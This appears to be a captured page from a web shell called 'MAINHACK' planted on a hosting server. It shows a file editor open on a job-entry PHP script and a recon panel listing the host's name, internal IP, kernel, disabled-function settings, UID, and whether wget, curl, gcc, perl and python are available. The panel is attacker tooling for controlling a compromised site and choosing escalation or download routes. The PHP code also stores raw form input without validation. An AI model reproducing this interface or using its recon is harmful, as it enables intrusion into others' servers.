[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: add_job.php
<?php include 'header.php' ; $show=new Oops($db); ?> <style type="text/css"> #fli,#fli1 { } #display { position:absolute; width:315px; margin-left:0; margin-top:0px; max-height:300px; padding:2px; display:none; border-top:0px; overflow:auto; border:1px #CCC solid; background-color: white; z-index:1000; } .show,.show1 { padding:7px; border-bottom:1px #999 dashed; font-size:15px; } .show:hover,.show1:hover { background:#4f52ba; color:#FFF; cursor:pointer; } .widget{ overflow:visible !important; } </style> <div id="page-wrapper"> <div class="main-page"> <div class="row"> <div class="form-grids row widget-shadow" data-example-id="basic-forms"> <div class="form-title"> <h4>Job Entry :</h4> </div> <div class="form-body"> <form method="post" enctype="multipart/form-data"> <div class="col-md-4"> <div class="form-group"> <label>Job Title</label> <input type="text" class="form-control" id="title" name="title" placeholder="Job Title"> </div> </div> <div class="col-md-8"> <div class="form-group"> <label>Job Description</label> <textarea class="form-control" id="description" name="description" placeholder="Job Description"></textarea> </div> </div> <button type="submit" class="btn btn-info btn-fill pull-right" name="sub">Submit</button> <div class="clearfix"></div> </form> <?php if(isset($_POST['sub'])){ $table='job'; include 'job_id.php'; $data=array( 'job_id'=>$uid, 'title'=>$_POST['title'], 'description'=>$_POST['description'], 'date'=>date('Y-m-d'), ); // print_r($data); $r=$show->insert($table,$data); if($r){ echo "<script>sweetAlert('Ok','New Job has been added','success');</script>"; }else{ echo "ss"; } } ?> </div> </div> </div> </div> </div> <?php include 'footer.php' ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.64 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619